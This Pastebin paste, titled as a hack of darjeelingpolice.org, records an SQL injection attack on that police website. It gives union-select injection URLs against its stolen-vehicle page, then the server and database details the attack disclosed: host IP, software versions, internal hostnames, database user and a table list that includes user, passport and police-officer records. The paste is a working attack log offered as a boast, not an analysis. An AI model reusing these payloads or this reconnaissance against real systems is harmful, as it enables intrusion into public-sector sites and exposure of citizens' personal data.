sepo

darjeelingpolice.org hacked by SEPO

Nov 7th, 2011
256
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.12 KB | None | 0 0
  1. target:http://darjeelingpolice.org
  2.  
  3. sqli:
  4. http://darjeelingpolice.org/stolen_vehicle_view.php?ID=-130+order+by+21--
  5.  
  6. http://darjeelingpolice.org/stolen_vehicle_view.php?ID=-130+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
  7.  
  8. http://darjeelingpolice.org/stolen_vehicle_view.php?ID=-130+union+select+1,2,3,4,version(),6,database(),8,user(),10,11,12,13,14,15,16,17,18,19,20,21--
  9.  
  10. info:
  11. Host IP: 65.254.248.137
  12. Web Server: Nginx / Varnish
  13. Powered-by: PHP/5.2.17
  14. DB Server: MySQL
  15. Resp. Time(avg):515 ms
  16. Current User: dp416@cgi1704.int.bizland.net
  17. Sql Version: 5.0.91-log
  18. Current DB: darjeeling_police
  19. System User: dp416@cgi1704.int.bizland.net
  20. Host Name: custsqlm08.int.bizland.net
  21. Installation dir:/usr/local/mysql-5.0.91-linux-x86_64-glibc23/
  22. DB User: 'dp416'@'10.%'
  23. Data Bases: information_schema
  24. darjeeling_police
  25.  
  26. Tables:
  27.  
  28. alartmail,announcement,contact_us,events,feedback,good_citizen,missing_person_master,most_wanted_master,passport_master,pickup_master,police_officer_master,police_station_master,siteconfig,stolen_vehicle,tender_master,traffic,traffic_status,user_master,visitor
  29.  
  30.  
Add Comment
Please, Sign In to add comment